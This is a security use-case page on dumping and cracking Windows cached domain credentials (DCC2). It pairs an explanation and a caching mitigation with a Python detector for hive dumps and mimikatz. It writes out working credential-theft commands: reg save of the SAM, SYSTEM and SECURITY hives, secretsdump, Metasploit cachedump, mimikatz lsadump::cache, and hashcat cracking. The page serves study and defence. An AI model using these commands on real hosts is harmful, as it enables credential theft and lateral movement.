
UC0022: Dumping and Cracking mscash

Summary

ID: UC0022
Brief Description: Dumping of cached domain credentials (mscash), which Windows stores so that domain users can still authenticate when no domain controller is available.
Author: Alex@Cyberok
Creation Date: 2023/02/28
Modification Date: 2023/02/28
ATT&CK Techniques:
Tags:
  • Credential Access
  • Windows
Linked Response Playbooks:
Artifacts:

Description

Mscash is a Microsoft hashing algorithm used to store cached domain credentials locally on a system after a successful logon. Note that cached credentials do not expire. Domain credentials are cached on the local system so that domain members can log on to the machine even if the DC is down. Note also that an mscash hash is not passable: pass-the-hash (PtH) attacks do not work with it.

Windows caches previous users' logon information locally so that they can log on if a logon server is unavailable during later logon attempts. If a domain controller is unavailable and a user's logon information is cached, the user will be prompted with a dialog that says:

  • A domain controller for your domain could not be contacted. You have been logged on using cached account information. Changes to your profile since you last logged on may not be available.

With caching disabled, the user is prompted with this message:

  • The system cannot log you on now because the domain is not available.

This is known as Domain Cached Credentials (DCC); the same hash is also referred to as MSCACHE or MSCASH. The password hash is generated with the MSCACHE algorithm and stored locally in the Windows registry (in the SECURITY hive). By default the last 10 logons are cached.

There are two versions of MSCASH/MSCACHE (DCC):

  • MSCACHEv1 (DCC1): used before Vista and Server 2003
  • MSCACHEv2 (DCC2): used after Vista and Server 2003

Cached logon information is controlled by the following key:

  • Location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
  • Value name: CachedLogonsCount
  • Data type: REG_SZ
  • Values: 0 - 50

Any change to this value requires a restart of the computer to take effect. A value of 0 disables caching entirely (the user then sees the "domain is not available" message above); lowering the value reduces the number of cached credentials that can be dumped from a compromised host.

Attack mapping

Artifact              Object                 Description
Attack prerequisites
Host                  Compromised host       A host to which the attacker has privileged access
File                  Secretsdump/Mimikatz   Depending on the software used, the "file" entity is either secretsdump.py or the mimikatz executable
Windows Registry      Registry               hklm\sam, hklm\system, hklm\security registry hives
Side observables
File                  Registry hive dumps    Dumps of hklm\sam, hklm\system, hklm\security
Encrypted Credential  Mscash                 Credential that can be used for further dumping and cracking
Password              User's password        Plaintext password that can be recovered from the encrypted credential

Attack results

Extract a Mscash of domain user for further cracking to get user's password.

Resource             Description
Attack prerequisites
Privileged Access    Compromised host with privileged access
Result consequences
Credential Access    If the hash is cracked successfully, the attacker obtains a plaintext password that can be used in later stages of the attack, for example for lateral movement

Attack progress

Cachedump

1) To dump cached domain credentials in mscash format from a Meterpreter session, use the Metasploit post-exploitation module cachedump:

    getuid
    getsystem
    use post/windows/gather/cachedump
    run

The hashes can also be extracted with the Python Impacket library (secretsdump.py); this requires the SYSTEM and SECURITY hives stored in the registry. The following commands export these hives from the registry and save them on the local machine:

    reg.exe save hklm\sam c:\temp\sam.save
    reg save hklm\system c:\system.save
    reg save hklm\security c:\security.save

Once the hives are saved, they can be copied back to the Kali Linux machine to extract the hashes:

    secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

[Screenshot: secretsdump.py output]

Mimikatz

2) Mimikatz (mimikatz.exe and mimilib.dll) must first be copied to the host; here Metasploit is used to upload the files into %temp%.

[Screenshot: uploading Mimikatz with Metasploit]

DCC2 / MSCACHEv2 hashes can then be obtained by running mimikatz on the compromised host with the following commands:

    privilege::debug
    token::elevate
    lsadump::cache

[Screenshot: cached credentials listed by lsadump::cache]
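As an added defender-side example (not part of this use case or of the tools it names), the following Python detector runs over constructed process-creation log lines and flags the two collection paths shown above: "reg save" of the SYSTEM and SECURITY hives by one user on one host within a short window, and "lsadump::cache" appearing on a command line. The field names, hosts, users, paths and the 10-minute window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (field names loosely follow Sysmon Event ID 1);
# hosts, users, paths and timestamps are made up for this example.
SAMPLE_EVENTS = [
    {"ts": "2023-02-28T10:00:01", "host": "WS01", "user": "CORP\\svc_backup",
     "cmd": "reg.exe save hklm\\sam c:\\temp\\sam.save"},
    {"ts": "2023-02-28T10:00:05", "host": "WS01", "user": "CORP\\svc_backup",
     "cmd": "reg save hklm\\system c:\\system.save"},
    {"ts": "2023-02-28T10:00:09", "host": "WS01", "user": "CORP\\svc_backup",
     "cmd": "reg save hklm\\security c:\\security.save"},
    {"ts": "2023-02-28T11:30:00", "host": "WS02", "user": "CORP\\jdoe",
     "cmd": "reg save hklm\\software\\policies c:\\backup\\policies.hiv"},  # unrelated hive
    {"ts": "2023-02-28T12:15:42", "host": "WS03", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": 'C:\\Users\\Public\\m.exe "privilege::debug" "token::elevate" "lsadump::cache" exit'},
]

# "reg save" of one of the three hives the use case lists; HKLM may also be spelled out in full
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)
# the mimikatz module from the page, passed on the command line (a renamed binary still shows it)
LSADUMP_CACHE = re.compile(r"lsadump::cache", re.I)
WINDOW = timedelta(minutes=10)  # assumption: hive saves this close together are one dump


def detect(events):
    """Return alerts as (host, rule, detail) tuples."""
    alerts = []
    saves = defaultdict(list)  # (host, user) -> [(timestamp, hive)]
    for ev in events:
        cmd = ev["cmd"]
        m = HIVE_SAVE.search(cmd)
        if m:
            saves[(ev["host"], ev["user"])].append(
                (datetime.fromisoformat(ev["ts"]), m.group(1).lower()))
        if LSADUMP_CACHE.search(cmd):
            alerts.append((ev["host"], "mimikatz_lsadump_cache", cmd))
    # Recovering DCC hashes offline (secretsdump) needs SYSTEM (boot key) plus SECURITY (the
    # cache itself); SAM alone only yields local accounts, so require both within the window.
    for (host, user), items in saves.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            hives = {h for t, h in items[i:] if t - t0 <= WINDOW}
            if {"system", "security"} <= hives:
                alerts.append((host, "offline_hive_dump_dcc", f"{user} saved {sorted(hives)}"))
                break
    return alerts
```

The Metasploit cachedump module reads the cache from within the Meterpreter session rather than spawning reg.exe, so it needs different telemetry (for example object-access auditing on the SECURITY hive) rather than command-line matching.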

Possible usage

Cracking mscash / mscache with HashCat

1) To crack mscache hashes with hashcat, they must be in the following format (hashcat mode 2100 is DCC2 / MSCACHEv2; 10240 is the iteration count of the hash):

    $DCC2$10240#username#hash

Let's try cracking it with hashcat now:

    hashcat -m2100 '$DCC2$10240#Administrator#206dd880bb27121182298a0bd8b87d1c' /home/kali/Desktop/passwords.txt --force --potfile-disable

[Screenshots: hashcat run and cracked result]

Attack diagram

[Attack diagram image not reproduced here]
